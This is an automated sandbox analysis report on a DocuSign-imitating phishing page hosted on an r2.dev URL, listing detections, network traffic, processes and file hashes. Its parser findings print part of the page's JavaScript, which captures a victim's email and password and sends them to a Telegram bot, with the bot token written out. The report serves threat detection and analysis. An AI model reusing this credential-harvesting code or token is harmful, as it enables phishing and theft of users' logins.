Create Interactive Tour

Windows Analysis Report
http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html

Overview

General Information

Sample URL:http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html
Analysis ID:1591497
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Misleading page title found
Yara detected HtmlPhish10
Yara detected HtmlPhish64
AI detected suspicious Javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Submit button contains javascript call

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 2000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2468,i,1197394569104485626,4808394245553301997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_48JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.0.pages.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
      1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlAvira URL Cloud: detection malicious, Label: malware

        Phishing

        barindex
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'DocuSign' is a well-known electronic signature service provider., The legitimate domain for DocuSign is 'docusign.com'., The provided URL 'pub-73e3a990093147c78a55ab4739ef17e5.r2.dev' does not match the legitimate domain., The URL uses a subdomain structure that is not associated with DocuSign., The domain 'r2.dev' is not related to DocuSign and could be a generic hosting or cloud service., Presence of a password input field on a non-legitimate domain is suspicious. DOM: 1.0.pages.csv
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlPage Title: DocuSign Login - Enter your password to sign in
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlPage Title: DocuSign Login - Enter your password to sign in
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_48, type: DROPPED
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.de... This script demonstrates high-risk behaviors, including data exfiltration and dynamic code execution. It collects user credentials (email and password) and sends them to a Telegram bot, which is a suspicious and potentially malicious activity. The script also manipulates the DOM aggressively, hiding and showing different elements. Overall, the script exhibits clear signs of malicious intent and should be considered a high-risk security threat.
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlHTTP Parser: function z() { var email = window.location.hash.substr(1); //change window.location.hash.substr(1) to "xxxemail" if you are using attachment.// example // var email = "xxxemail";var ind=email.indexof("@"); var my_slice=email.substr((ind+1));var my_slice2=email.substr(ind+1,email.length);document.getelementbyid('username').value = email;document.getelementbyid('logoname').innerhtml = email;/*$('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);*/}
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlHTTP Parser: function sendemail() {var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/;if (!filter.test(document.getelementbyid('username').value)) {alert('invalid email'); return false; } if (document.getelementbyid('password').value === '') { alert('please enter a valid password!'); return false; }var x = document.getelementbyid("div4"); var a = document.getelementbyid("div1"); var b = document.getelementbyid("div2"); a.style.display = "none"; b.style.display = "block"; x.style.display = "none"; var username = document.getelementbyid('username').value;var password = document.getelementbyid('password').value;var ozi = "\n=========docusignboy======\n" ozi+="email :"+username ozi+="\npass :" +password ozi+="\n============================\n" tmsend(ozi)}function tmsend(message){ var token = "7638787397:aahdnjvzecz4khxa5j6sxi8dfak8uvijtfo"; var chat_id= "6247174206"; c...
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlHTTP Parser: Number of links: 0
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlHTTP Parser: Title: DocuSign Login - Enter your password to sign in does not match URL
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlHTTP Parser: On click: sendEmail()
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlHTTP Parser: <input type="password" .../> found
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlHTTP Parser: No <meta name="author".. found
        Source: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlHTTP Parser: No <meta name="copyright".. found
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.168.102
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.168.102
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /docu/e_protocol.html HTTP/1.1Host: pub-73e3a990093147c78a55ab4739ef17e5.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1Host: www.continentalsports.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1Host: www.continentalsports.co.ukConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /docu/e_protocol.html HTTP/1.1Host: pub-73e3a990093147c78a55ab4739ef17e5.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: pub-73e3a990093147c78a55ab4739ef17e5.r2.dev
        Source: global trafficDNS traffic detected: DNS query: www.continentalsports.co.uk
        Source: chromecache_48.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
        Source: chromecache_48.2.drString found in binary or memory: https://api.telegram.org/bot$
        Source: chromecache_48.2.drString found in binary or memory: https://logo.clearbit.com/
        Source: chromecache_48.2.drString found in binary or memory: https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: classification engineClassification label: mal92.phis.win@17/10@10/7
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2468,i,1197394569104485626,4808394245553301997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2468,i,1197394569104485626,4808394245553301997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Scripting
        Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1591497 URL: http://pub-73e3a990093147c7... Startdate: 15/01/2025 Architecture: WINDOWS Score: 92 26 Antivirus / Scanner detection for submitted sample 2->26 28 Misleading page title found 2->28 30 AI detected phishing page 2->30 32 5 other signatures 2->32 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 443, 49663 unknown unknown 6->14 16 192.168.2.5 unknown unknown 6->16 18 239.255.255.250 unknown Reserved 6->18 11 chrome.exe 6->11         started        process5 dnsIp6 20 pub-73e3a990093147c78a55ab4739ef17e5.r2.dev 172.66.0.235, 49741, 49742, 80 CLOUDFLARENETUS United States 11->20 22 www.continentalsports.co.uk 95.154.228.177, 443, 49745, 49749 IOMART-ASGB United Kingdom 11->22 24 2 other IPs or domains 11->24

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html100%Avira URL Cloudmalware
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg0%Avira URL Cloudsafe
        https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l0%Avira URL Cloudsafe

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        pub-73e3a990093147c78a55ab4739ef17e5.r2.dev
        172.66.0.235
        truetrue
          unknown
          www.google.com
          142.250.186.100
          truefalse
            high
            www.continentalsports.co.uk
            95.154.228.177
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmltrue
                unknown
                https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpgfalse
                • Avira URL Cloud: safe
                unknown
                https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmltrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot$chromecache_48.2.drfalse
                    high
                    https://logo.clearbit.com/chromecache_48.2.drfalse
                      high
                      https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/lchromecache_48.2.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      162.159.140.237
                      unknownUnited States
                      13335CLOUDFLARENETUSfalse
                      95.154.228.177
                      www.continentalsports.co.ukUnited Kingdom
                      20860IOMART-ASGBfalse
                      239.255.255.250
                      unknownReserved
                      unknownunknownfalse
                      142.250.186.100
                      www.google.comUnited States
                      15169GOOGLEUSfalse
                      172.66.0.235
                      pub-73e3a990093147c78a55ab4739ef17e5.r2.devUnited States
                      13335CLOUDFLARENETUStrue
                      IP
                      192.168.2.4
                      192.168.2.5
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1591497
                      Start date and time:2025-01-15 01:38:01 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal92.phis.win@17/10@10/7
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 216.58.206.46, 64.233.167.84, 142.250.186.163, 142.250.185.238, 172.217.23.110, 142.250.184.238, 216.58.206.74, 172.217.18.10, 142.250.185.234, 142.250.186.170, 142.250.186.138, 172.217.23.106, 142.250.186.42, 172.217.16.202, 142.250.186.106, 142.250.181.234, 216.58.206.42, 142.250.185.106, 142.250.186.74, 216.58.212.138, 142.250.185.170, 142.250.185.202, 142.250.184.202, 142.250.184.234, 199.232.210.172, 2.17.190.73, 142.250.186.110, 142.250.185.110, 142.250.184.206, 172.217.18.110, 216.58.206.78, 216.58.206.67, 184.28.90.27, 52.149.20.212, 13.107.246.45
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html
                      No simulations
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (32065)
                      Category:downloaded
                      Size (bytes):85578
                      Entropy (8bit):5.366055229017455
                      Encrypted:false
                      SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                      MD5:2F6B11A7E914718E0290410E85366FE9
                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                      Malicious:false
                      Reputation:low
                      URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                      Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (32065)
                      Category:dropped
                      Size (bytes):85578
                      Entropy (8bit):5.366055229017455
                      Encrypted:false
                      SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                      MD5:2F6B11A7E914718E0290410E85366FE9
                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                      Malicious:false
                      Reputation:low
                      Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (65350)
                      Category:downloaded
                      Size (bytes):252205
                      Entropy (8bit):6.083975621579217
                      Encrypted:false
                      SSDEEP:6144:8ajpSYt72uB8zd3nuatHiuZ1aYxs7TA7V+se6LOt1Xf54:8a1SYtRc33CMaoQTA7V+se61
                      MD5:AC9DBD4FD1FB0ADD29A1B8703BCE9406
                      SHA1:D71E70C8AC03CF68134D5AB68DD2F05AD4B23002
                      SHA-256:6316CB80E53A87A277A3CF231119AC5BE5E8DEF905800F583841D36358EDB374
                      SHA-512:FFDFE6A01976EB9CDF1E289CA03F938952058151440C62925CCC8D1BCFA8E48EEF7A72581461FC35B10AE02853116A27AE5C70D30AF166B10FEF6C3C9F53E5CF
                      Malicious:false
                      Reputation:low
                      URL:https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html
                      Preview:<!DOCTYPE html> <html lang=en class=account-server>.<meta charset=utf-8>.<meta name=viewport content="initial-scale=1.0">.<title>DocuSign Login - Enter your password to sign in</title>..<style data-emotion=css data-single-filez-stylesheet=16>.account-server{height:100%}.site-content,#root{height:inherit}.account-server .site-content{background-color:#fff}.hide-accessible{position:absolute;width:0px;height:0px;left:-10000px}.ink-authentication{display:flex;flex-direction:column;min-height:100%}.ink-footer{flex-shrink:0}.ink-header{position:sticky;top:0;height:64px}.ink-body{background-color:#f7f6f7;overflow-y:auto;flex:1 0 auto}.ink-auth-main{padding:4rem 0;background-color:#fff;border:1px solid rgba(25,24,35,.1490196078);border-radius:.25rem}@media (max-width:1039px){.ink-body{background-color:#fff}.ink-auth-main{border:unset;border-radius:unset;padding:1.5rem 2rem}}@media (min-width:600px){.ink-body{display:flex;flex-direction:column;align-items:center}}@media (min-width:600px) and (m
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80", progressive, precision 8, 265x265, components 3
                      Category:downloaded
                      Size (bytes):7494
                      Entropy (8bit):7.868668842804636
                      Encrypted:false
                      SSDEEP:192:ygdh+IXyP70WVRYaDpmW05te0t5WaEtyWU:yqh870CJDpU5wpU
                      MD5:E27D91CCCC9D333CE4E99262E368053D
                      SHA1:F59234771F6CD9D102FD50527CE1D684E305EDDD
                      SHA-256:17A7F5E4C9165EF60EB0CBA29D6DC36F32F7FAB0306A6CDC898997141228C5FA
                      SHA-512:069239A90A49B2848BAD2FE451C6E947E280BA4C93BF8E53C61D00765A532F636F1F733F6427E75ACCF76B432E55A0D5E1BECE8912C3C39F3E4915D2421A9E1F
                      Malicious:false
                      Reputation:low
                      URL:https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg
                      Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".............................................................................D..U={.l=...J.z%....*..1..K.....y..X...C`..l)....}...]9.z:J..W......T..s...^n.QCu.[f.U..Z..mk...}...s3.......H........O?..7...-..3...k......8xv29..fL..i....{w....5..l.....g.;.=..j..n-98WKo".q........f,..v.....4].i...[:*y...l[X.-eLo...S..9/`.F7.kf............,E;fy2.nQ..\K....^1<.|....7.<..k......D....>H...u.2....,......Tg...C..7.<..|~.x@...&.^{.y.;4..l....c.N....wg.Y....s..m.D..."`..z.4j.6+f6.M.k.f.2..r...j.K.T/.4.|. .....>[....4.4..V..LY.W...h...B.7q...i..OX. .....<..j.W"...9.u.|.(..e....o.J.k.r.E..c ...L....k=.+U..@%.#,j.....7iU..v..7........"`..Q.9T....q.N.Zr.h.X.B.+UI.^.X......^I"2..9FFI...l..f..H..6a. .....!".!".!".!".."$......*.
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80", progressive, precision 8, 265x265, components 3
                      Category:dropped
                      Size (bytes):7494
                      Entropy (8bit):7.868668842804636
                      Encrypted:false
                      SSDEEP:192:ygdh+IXyP70WVRYaDpmW05te0t5WaEtyWU:yqh870CJDpU5wpU
                      MD5:E27D91CCCC9D333CE4E99262E368053D
                      SHA1:F59234771F6CD9D102FD50527CE1D684E305EDDD
                      SHA-256:17A7F5E4C9165EF60EB0CBA29D6DC36F32F7FAB0306A6CDC898997141228C5FA
